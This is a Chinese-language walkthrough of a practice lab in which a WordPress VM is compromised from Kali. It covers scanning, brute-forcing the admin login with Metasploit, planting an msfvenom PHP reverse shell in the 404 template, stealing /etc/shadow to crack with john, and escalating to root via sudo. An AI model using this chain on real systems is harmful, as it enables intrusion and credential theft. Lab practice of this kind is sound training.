赞
踩
开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。
查看攻击机kali的IP,为192.168.137.176
查看靶机的IP,为192.168.137.176
ping一下,测试连通性,没问题,开始信息收集。
探测靶场开放的端口信息与服务版本
nmap -sV 192.168.137.197
使用nikto对开放的80端口进行进一步挖掘,发现可疑目录,/sercet/。
nikto -host http://192.168.137.197
把它粘贴到浏览器去访问一下
http://192.168.137.197/secret/
往下浏览,发现一个log in链接,点击
发现后台登录页面。
使用wpscan,获取目标网页的用户名,发现用户名admin。
wpscan --url 192.168.137.197/secret/ --enumerate u
得到了用户名,那接着使用metasploit对密码进行暴力破解。
启动 msfconsole 选择模块 use auxiliary/scanner/http/wordpress_login_enum 查看参数 show options 设置目标ip set rhosts 192.168.137.197 设置密码文件 set PASS_FILE /usr/share/wordlists/dirb/common.txt 设置我们已经知道的用户名admin set username admin 设置目标uri set targeturi /secret/ 运行,开始破解 run
破解成功,用户名为admin,密码为admin。
去登录页面,输入admin和admin进入后台
使用msfvenom制作shell代码,将代码复制下来。
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.137.176 lport=4444 -f raw
去到后台页面,点击右侧的Appearance的editor
再点击右侧的404 Template,将其代码替换成我们的shell代码
点击update file按钮提交,更新完成。
回到终端,使用msf监听4444端口
退出当前模块
back
使用监听模块
use exploit/multi/handler
设置为php模式
set payload php/meterpreter/reverse_tcp
查看参数
show options
设置kali的ip
set LHOST 192.168.137.176
开始监听
run
去浏览器访问shell所在的404页面。
192.168.137.197/secret/wp-content/themes/twentyseventeen/404.php
回到终端,已经返回了shell,sysinfo一下没问题。
输入shell,id一下,是www-data用户,权限不够,需提权
下载/etc/passwd和/etc/shadow文件
download /etc/passwd
download /etc/shadow
新开一个终端,ls一下,可以看到下载的两个文件,使用unshadow进行整合
unshadow passwd shadow > cracked
使用john对生成的cracked进行解密,得到用户marlinspike与密码marlinspike
回到终端的shell,先优化终端一下
python -c "import pty;pty.spawn('/bin/bash')"
开始root提权操作
切换到marlinspike用户
su - marlinspike
查看权限
sudo -l
提权
sudo bash
进入到root目录,寻找flag文件。
这次靶机主要是相关的HTTP服务练习,并没有flag值,所以至此完工!!!
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。